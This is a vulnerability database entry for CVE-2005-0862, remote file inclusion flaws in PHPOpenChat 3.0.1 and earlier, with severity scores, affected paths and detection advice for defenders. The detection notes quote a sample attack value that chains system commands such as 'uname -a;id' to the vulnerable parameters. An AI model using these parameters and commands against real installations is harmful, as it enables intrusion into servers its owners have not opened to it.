cbcvebase.
CVE-2005-0862
published 2005-05-02

CVE-2005-0862: Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3.0.1 and earlier allow remote attackers to execute arbitrary PHP code via the…

PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
10.92%
95.3th percentile
Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3.0.1 and earlier allow remote attackers to execute arbitrary PHP code via the phpbb_root_path parameter to (1) poc_loginform.php or (2) phpbb/poc.php, the poc_root_path parameter to (3) phpbb/poc.php, (4) phpnuke/ENGLISH_poc.php, (5) phpnuke/poc.php, or (6) yabbse/poc.php, or (7) the sourcedir parameter to yabbse/poc.php.

Affected

2 ranges
VendorProductVersion rangeFixed in
phpopenchatphpopenchat
phpopenchatphpopenchat

Detection & IOCsextracted from sources · hover to see the quote

path/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php
path/phpopenchat/contrib/phpnuke/ENGLISH_poc.php
path/phpopenchat/contrib/phpnuke/poc.php
path/phpopenchat/contrib/yabbse/poc.php
  • Monitor HTTP requests containing 'phpbb_root_path', 'poc_root_path', or 'sourcedir' parameters with remote HTTP/HTTPS URLs as values — a hallmark of PHP remote file inclusion exploitation against PHPOpenChat.
  • Alert on inbound GET/POST requests to paths matching */contrib/phpbb/*/poc_loginform.php, */contrib/phpnuke/poc.php, */contrib/phpnuke/ENGLISH_poc.php, or */contrib/yabbse/poc.php with any parameter value beginning with 'http://' or 'https://'.
  • Presence of a 'cmd' parameter alongside the RFI parameter (e.g., &cmd=uname%20-a;w;id;pwd;ps) indicates active exploitation with OS command injection chained to the file inclusion.
  • ·The RFI attack requires PHP's 'allow_url_include' (or 'allow_url_fopen' in older PHP versions) to be enabled. Installations with these directives disabled are not exploitable via this vector.
  • ·All affected files reside under the 'contrib/' directory tree; deployments that do not expose or have removed the contrib/ directory reduce their attack surface significantly.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.